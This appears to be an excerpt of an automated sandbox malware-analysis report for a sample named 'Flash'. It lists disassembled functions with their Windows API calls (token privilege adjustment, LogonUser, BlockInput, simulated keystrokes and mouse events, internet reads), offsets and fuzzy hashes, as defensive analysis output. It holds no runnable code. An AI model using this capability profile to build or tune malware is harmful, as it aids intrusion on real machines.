                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: c9e98854adcfbf894fc018c58bbd9a0f651088f3e72120bcbd6df37b39fede78
                                                        • Instruction ID: 9dd40fb25fe2a5fcf7540c0a1f976394e8acec0fa7f9d170c5e90e7598ff13d9
                                                        • Opcode Fuzzy Hash: c9e98854adcfbf894fc018c58bbd9a0f651088f3e72120bcbd6df37b39fede78
                                                        • Instruction Fuzzy Hash: 4D41D475680610AFDB10AFA4DC86F6E73F99F88710F04C55DFA16AB3D2DA70AD018B91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: e0f481b7a86e4a30b1ee75c752fcdb7a0785866f9d0e53238be38bfc1811d029
                                                        • Instruction ID: df4e9cab18fc4ca5a8b6fab114e68976a3226d5a5870c7770a8577270d7c196f
                                                        • Opcode Fuzzy Hash: e0f481b7a86e4a30b1ee75c752fcdb7a0785866f9d0e53238be38bfc1811d029
                                                        • Instruction Fuzzy Hash: B9110871B409119FE7115F76DC94B2F7BA9FF84762F008129FD46D7241DB70E9028A90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: c36d5167c3b16723d887c6feabbea3983e51caf12c2c6c53b05bb1b41c76138c
                                                        • Instruction ID: d5575708022da5d8f10d3076972c58809b231f2bb09450e920e04ec77cdc5800
                                                        • Opcode Fuzzy Hash: c36d5167c3b16723d887c6feabbea3983e51caf12c2c6c53b05bb1b41c76138c
                                                        • Instruction Fuzzy Hash: F4D01271854119EAC704DBA0C844EFA737CBB0C300F144453F606E2040E6B98BD89B22
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00A42AAD
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A42AE4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 7277a13e8160c4b6571000ef678c9ca5cea8c94ac6bc54e1cdd0d47a543fe6be
                                                        • Instruction ID: c0acc3c25551582329c99986d651a084f865528b9932f5be9a7733a7482320de
                                                        • Opcode Fuzzy Hash: 7277a13e8160c4b6571000ef678c9ca5cea8c94ac6bc54e1cdd0d47a543fe6be
                                                        • Instruction Fuzzy Hash: D3418079600609BFEB20DF95CC85FBBB7BCEBC0794F50406AFA05A6141DAB1AE419760
                                                        APIs
                                                          • Part of subcall function 009F0FE6: std::exception::exception.LIBCMT ref: 009F101C
                                                          • Part of subcall function 009F0FE6: __CxxThrowException@8.LIBCMT ref: 009F1031
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A293E3
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A29410
                                                        • GetLastError.KERNEL32 ref: 00A2941D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 90f7cc1aa65834b500e9c976db1e72d77615a7b3d248bbf1a7c32abfca7b8823
                                                        • Instruction ID: 96ba921b37af2e020a93284af013ad0b1e1eaaaaff3e8731fbd913951460b262
                                                        • Opcode Fuzzy Hash: 90f7cc1aa65834b500e9c976db1e72d77615a7b3d248bbf1a7c32abfca7b8823
                                                        • Instruction Fuzzy Hash: A21191B2418209AFD728EF54EC85D3BB7BCEB48710B20852EF45997641EB70EC41CB60
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A342FF
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00A3433C
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A34345
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 37cc05fd561a12d8cb88d6672b92603870dbb0f62fc2ee8bfb4a506e3b3b2b50
                                                        • Instruction ID: bad9cd89b84e766a4b2960b4df7689ab24eb6203fcc1a6f5749eae3220ac2e6a
                                                        • Opcode Fuzzy Hash: 37cc05fd561a12d8cb88d6672b92603870dbb0f62fc2ee8bfb4a506e3b3b2b50
                                                        • Instruction Fuzzy Hash: BD1152B1901229BEE710DBE89C48FAFB7BCEB09710F140656FA14EB190D2B46D4587A1
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A34F45
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A34F5C
                                                        • FreeSid.ADVAPI32(?), ref: 00A34F6C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: f543d16d8fc846d22a9af9f5f3b0b350bb87c0e73f8b9f70d3027de3ce821728
                                                        • Instruction ID: f3d1fe69e4f635647e65fc1c3eea4a4519f7338533b918e9501d4ce2aaa26329
                                                        • Opcode Fuzzy Hash: f543d16d8fc846d22a9af9f5f3b0b350bb87c0e73f8b9f70d3027de3ce821728
                                                        • Instruction Fuzzy Hash: 4CF03775A1120CBFDB00DFE09D89EAEBBB8EB08201F0044A9EA01E2180E6756A448B50
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A31B01
                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00A31B14
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: 6c13b43db5bb7886ef72ccad9f08d8f4f5e9c3a042a456d9b1e0b852181eef29
                                                        • Instruction ID: 34f92cc7c340bf0b874ff6786818b89ccdbe722998276854c2db41ac49ec7b52
                                                        • Opcode Fuzzy Hash: 6c13b43db5bb7886ef72ccad9f08d8f4f5e9c3a042a456d9b1e0b852181eef29
                                                        • Instruction Fuzzy Hash: 0BF0497190020DABDB00CF94C805BFEBBB4FF04315F00804AF95596292D3799615DF94
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00A49B52,?,00A6098C,?), ref: 00A3A6DA
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00A49B52,?,00A6098C,?), ref: 00A3A6EC
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: a5e8a2639cd15d9142894d36a97a5945777c2b6f2ecab792905a97203dce716f
                                                        • Instruction ID: 3d7a3149b3343817b0e86e357aa0a63a24594d8c1f8b22be250b0cdf3283b805
                                                        • Opcode Fuzzy Hash: a5e8a2639cd15d9142894d36a97a5945777c2b6f2ecab792905a97203dce716f
                                                        • Instruction Fuzzy Hash: 04F0823550422DBBDB21AFA4CC49FEA77ACAF09361F008155F91896181D7709940CBA1
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A28F27), ref: 00A28DFE
                                                        • CloseHandle.KERNEL32(?,?,00A28F27), ref: 00A28E10
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 49a03c6e6e3795afbb75ada6a42f7ccf1c0ba6430d5653ab5608fd71d0c2ac0a
                                                        • Instruction ID: 5ae0d65fca339dd63826687aeb26d859c62593948105919aaf121f05b9191f3f
                                                        • Opcode Fuzzy Hash: 49a03c6e6e3795afbb75ada6a42f7ccf1c0ba6430d5653ab5608fd71d0c2ac0a
                                                        • Instruction Fuzzy Hash: 95E04632010610EFE7262B60EC08E777BADEB00310B148829F59A80470CBA2ACD0DB50
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009F8F87,?,?,?,00000001), ref: 009FA38A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009FA393
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: acfb5b3689514b9cc5374fde1558769ee38ad7aa898807832058be79d60272ac
                                                        • Instruction ID: 341b54a662e86c4df083851444d27b7a8de9c6e19251aa021633813eb7560e7d
                                                        • Opcode Fuzzy Hash: acfb5b3689514b9cc5374fde1558769ee38ad7aa898807832058be79d60272ac
                                                        • Instruction Fuzzy Hash: 08B09231064208ABCA406BD1EC09F8A3F78EB44A63F004010F60D48260EBE254928A91
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00A445F0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 2d3d26a313619a8d97bb1da131580d7d95811551007ebd536e2864581029b964
                                                        • Instruction ID: 1c67163972703eed9b230bf9949c42c56bbc9dd1fa76a8dd1ea82661010140d0
                                                        • Opcode Fuzzy Hash: 2d3d26a313619a8d97bb1da131580d7d95811551007ebd536e2864581029b964
                                                        • Instruction Fuzzy Hash: 6CE01A392502159FD710AF99E804B9AB7E9AF98760F008416F949D7351DAB0AD418B91
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A35205
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: bcc803e3253f1c3c4ce8a8d0e3241da3754fad52f802dd8bc3572e2e31939f96
                                                        • Instruction ID: 41256acf0c14e915b2315afd2fc769303b72b23f671547652a15f80572497e57
                                                        • Opcode Fuzzy Hash: bcc803e3253f1c3c4ce8a8d0e3241da3754fad52f802dd8bc3572e2e31939f96
                                                        • Instruction Fuzzy Hash: 45D092A5960E0A79ED5867BC9E1FF771628E3017C1F95874BB142890C2EDD46886A432
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A28FA7), ref: 00A29389
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 6fdfb2216b3b00e44bb56b07e232360974bfb4ded160b3d6a6d6f0fc77adb5a6
                                                        • Instruction ID: eac5d503e0775853d9e17d59ebc6038d7a1cc9f8c5322cad09a786d568c8b554
                                                        • Opcode Fuzzy Hash: 6fdfb2216b3b00e44bb56b07e232360974bfb4ded160b3d6a6d6f0fc77adb5a6
                                                        • Instruction Fuzzy Hash: 06D09E3226450EBBEF019EA4DD05EAF3B79EB04B01F408511FE15D51A1C775D935AB60
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00A10734
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 19d4d442ab87b6d27fee9e7027de5ded44ad3cee514d203aa03495064aa7451c
                                                        • Instruction ID: b72889fa6f77280fd53d40e29c3f834887f764fd02a2ab9424f102080c8943b8
                                                        • Opcode Fuzzy Hash: 19d4d442ab87b6d27fee9e7027de5ded44ad3cee514d203aa03495064aa7451c
                                                        • Instruction Fuzzy Hash: 3AC04CF1800109DBCB05DBA0D988EEF7BBCBB08305F100455E105B2100D7B49B848A71
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009FA35A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 926ef9157f058ef9b08e59b647a83986381a9c1b6a513b89936164de0fce78a9
                                                        • Instruction ID: b80eaeb6612b373fd67f325f75bc2486c8aee12d88df350f76361b8b44c63551
                                                        • Opcode Fuzzy Hash: 926ef9157f058ef9b08e59b647a83986381a9c1b6a513b89936164de0fce78a9
                                                        • Instruction Fuzzy Hash: 22A0243001010CF7CF001FC1FC04C457F7CD7001517004010F40C04131D773545145C0
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,00A60980), ref: 00A53C65
                                                        • IsWindowVisible.USER32(?), ref: 00A53C89
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: e44dbd245a0ba69a1034a0366151974daa047666a39ea9da64ac707f7dff0bcd
                                                        • Instruction ID: 2fcdc9961d7efa52fc25b3f96b922674059dff74bd6dfda5455e4d13c092fa48
                                                        • Opcode Fuzzy Hash: e44dbd245a0ba69a1034a0366151974daa047666a39ea9da64ac707f7dff0bcd
                                                        • Instruction Fuzzy Hash: 6CD16B312042149BCB14EF54D451AAAB7B6BFD4394F208868FD865B2E3CB35EE4ECB51
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00A5AC55
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A5AC86
                                                        • GetSysColor.USER32(0000000F), ref: 00A5AC92
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00A5ACAC
                                                        • SelectObject.GDI32(?,?), ref: 00A5ACBB
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A5ACE6
                                                        • GetSysColor.USER32(00000010), ref: 00A5ACEE
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00A5ACF5
                                                        • FrameRect.USER32(?,?,00000000), ref: 00A5AD04
                                                        • DeleteObject.GDI32(00000000), ref: 00A5AD0B
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00A5AD56
                                                        • FillRect.USER32(?,?,?), ref: 00A5AD88
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A5ADB3
                                                          • Part of subcall function 00A5AF18: GetSysColor.USER32(00000012), ref: 00A5AF51
                                                          • Part of subcall function 00A5AF18: SetTextColor.GDI32(?,?), ref: 00A5AF55
                                                          • Part of subcall function 00A5AF18: GetSysColorBrush.USER32(0000000F), ref: 00A5AF6B
                                                          • Part of subcall function 00A5AF18: GetSysColor.USER32(0000000F), ref: 00A5AF76
                                                          • Part of subcall function 00A5AF18: GetSysColor.USER32(00000011), ref: 00A5AF93
                                                          • Part of subcall function 00A5AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A5AFA1
                                                          • Part of subcall function 00A5AF18: SelectObject.GDI32(?,00000000), ref: 00A5AFB2
                                                          • Part of subcall function 00A5AF18: SetBkColor.GDI32(?,00000000), ref: 00A5AFBB
                                                          • Part of subcall function 00A5AF18: SelectObject.GDI32(?,?), ref: 00A5AFC8
                                                          • Part of subcall function 00A5AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00A5AFE7
                                                          • Part of subcall function 00A5AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A5AFFE
                                                          • Part of subcall function 00A5AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00A5B013
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
